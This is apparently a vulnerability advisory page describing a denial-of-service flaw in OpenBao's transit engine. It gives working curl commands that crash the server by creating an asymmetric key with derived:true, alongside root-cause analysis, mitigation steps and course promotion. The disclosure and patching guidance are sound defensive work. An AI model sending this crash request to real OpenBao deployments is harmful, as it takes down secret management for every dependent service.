Listen to this Post
On OpenBao versions 2.5.4 and 2.5.2 (and likely earlier versions), an authenticated caller with write access to `transit/keys/` can crash the OpenBao server by issuing a single key-creation request that combines an asymmetric type (rsa-, ecdsa-, ed25519) with derived: true. The server returns no HTTP response and the process terminates with exit code 2. This is a remote, low‑complexity denial‑of‑service against the OpenBao server.
The vulnerability lies in the transit engine’s key‑creation path. When `derived: true` is supplied alongside an asymmetric key type, the code path that handles key derivation assumes a symmetric key shape (a derivable key context). Because the asymmetric type does not provide the expected derived‑key fields, the creation path likely panics on a missing derived‑key field or an invalid type assertion, rather than returning a structured validation error. This panic is not recovered, causing the entire OpenBao process to crash. The issue can be triggered with either JSON or HCL payloads and affects all nodes in a cluster.
The root cause is the absence of a validation check that rejects the combination of `derived: true` with any non‑symmetric type. The fix should validate the (type, derived) combination at the top of the create‑key handler and return a 400 error if `derived: true` is set on any type other than the allowed symmetric ones (aes128-gcm96, aes256-gcm96, chacha20-poly1305, xchacha20-poly1305).
DailyCVE Form:
Platform: OpenBao
Version: 2.5.4, 2.5.2
Vulnerability: DoS
Severity: Moderate
date: 2026-06-17
Prediction: 2026-06-17
What Undercode Say:
Mount the transit engine:
curl -sS -X POST -H "X-Vault-Token: root" \
-d '{"type":"transit"}' \
http://127.0.0.1:8200/v1/sys/mounts/transit
Trigger the crash:
curl -sS -w '\nHTTP %{http_code}\n' -X POST \
-H "X-Vault-Token: root" \
-H "Content-Type: application/json" \
-d '{"type":"rsa-2048","derived":true,"exportable":true,"deletion_allowed":false}' \
http://127.0.0.1:8200/v1/transit/keys/some-key-name
Observed output:
HTTP 000 curl: (52) Empty reply from server $ docker ps -a --filter name=openbao STATUS: Exited (2)
Exploit:
An authenticated attacker with write permissions on the `transit/keys/` path can send a single POST request to create a key with an asymmetric type (e.g., rsa-2048, ecdsa-p256, ed25519) and the `derived: true` flag. The server will panic and crash immediately, with no HTTP response returned. The attack requires no special skills and has low complexity, making it easy to execute repeatedly to cause prolonged service unavailability.
Protection:
- Upgrade to the patched version (commit `0.0.0-20260617104123-db57c62602b2` or later) as soon as it becomes available.
- If immediate upgrade is not possible, restrict write access to the `transit/keys/` path to only highly trusted users, and monitor logs for unusual key‑creation requests with `derived: true` on asymmetric types.
- Apply the suggested fix by adding a validation check at the top of the create‑key handler that rejects `derived: true` for any non‑symmetric type and returns a 400 error.
Impact:
Successful exploitation causes the OpenBao server process to crash (exit code 2), resulting in a denial of service. All nodes in a cluster are affected, and the service becomes unavailable until the process is restarted. Since the attack is remote and requires only a single request, it can be repeated to keep the service down, impacting all applications and services that depend on OpenBao for secret management.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
